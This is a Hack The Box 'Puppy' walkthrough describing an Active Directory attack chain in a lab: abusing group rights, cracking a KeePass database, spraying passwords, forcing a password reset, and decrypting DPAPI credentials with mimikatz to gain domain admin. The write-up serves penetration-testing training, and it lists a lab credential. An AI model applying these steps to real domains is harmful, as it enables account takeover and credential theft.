HTB - Puppy
Description
This machine simulates an assumed breach scenario where initial access is already obtained. Using BloodHound, the player identifies a user with GenericWrite rights on a privileged group, enabling group membership manipulation. This escalation grants access to an SMB share containing a KeePass database secured with strong encryption, requiring the latest cracking tools. Further enumeration via BloodHound reveals a user with GenericAll rights over another account, allowing password changes. Leveraging this access leads to decrypted DPAPI credentials from a user folder, ultimately resulting in administrative access on the Domain Controller.
Enumeration
As is common in real life pentests, you will start the Puppy box with credentials for the following account:
levi.james/KingofAkron2025!
I will start with normal Nmap Scan, but first export the machine IP to a variable for easy usage.
Nmap Scan
Then, put all open ports into ports variable and run Nmap script and version scan
Summary
I started with enumerating smb looking for accessible shares, and I found DEV share but no access to it.
Before I moved further, I updated /etc/hosts with domain information to avoid any tooling issues
I used bloodhound.py to dump LDAP domain data, then ingested it into bloodhound-GUI to begin domain enumeration.
From Bloodhound, I found levi.James member in HR group and has GenericWrite on Developers group, which means I can add members to Developers group
Add levi to Developers group
With a membership in developers group, I looked at smb shares again and found READ access to DEV share
I accessed the share using smbclient.py from impacket toolkit and found .kdbx password database
After downloading it, I extracted the hash to try cracking it using keepass2john and john but I got this error:
The old version of john can't deal with the new hash version of keepass, but the latest version can. First, I downloaded the tool using the following commands:
Then, I started keepass2john and john from inside the repo folder and managed to crack the hash
After opening the database, I found several usernames with passwords for each one
Extracted the passwords to a file and started to spray them for each user in the domain. First, I got usernames list from nxc
With the users & passwords list, I could spray the passwords, and I found valid domain credentials
Foothold
From bloodhound-gui, I found ant.edwards member in Senior devs group and has GenericAll on adam.silver which means I can Change Password for adam.sliver
Take control of the user adam.silver
With adam account, I can access the machine via winRM
There is a problem with the accountdisabledSo I had to enable it before I could use it
Enable the account by modifying the UserAccountControl with 512 value (Enabled value)
Check Account Disable
Enable the account
Confirm it's enabled
Access the box
User Flag: 4b47de5ca3f585dxxxxxxxxxxxxxxxx
Lateral Movement
Under C:\, there is Backups folder
I then downloaded the file to examine it on my Kali machine
After unzipping the file, I found .bak a file containing the domain credentials for the user steph.cooper
He is a member of Remote Management Users, So I can access the box with him.
Privilege Escalation
Inside steph.cooper folder, where there are stored but encrypted credentials (DPAPI) and the
With mimikatz.exe, I managed to extract the masterkey and then decrypt the DPAPI secrets with it.
Alternatively, Download credential file and masterkey locally and dump them with
dpapi.pyfromimpacket
The found credential is for step.cooper_adm which is Admin on the domain controller
Get Root flag
Root Flag: e2353f53912199xxxxxxxxxxxxxxxxxxx
Last updated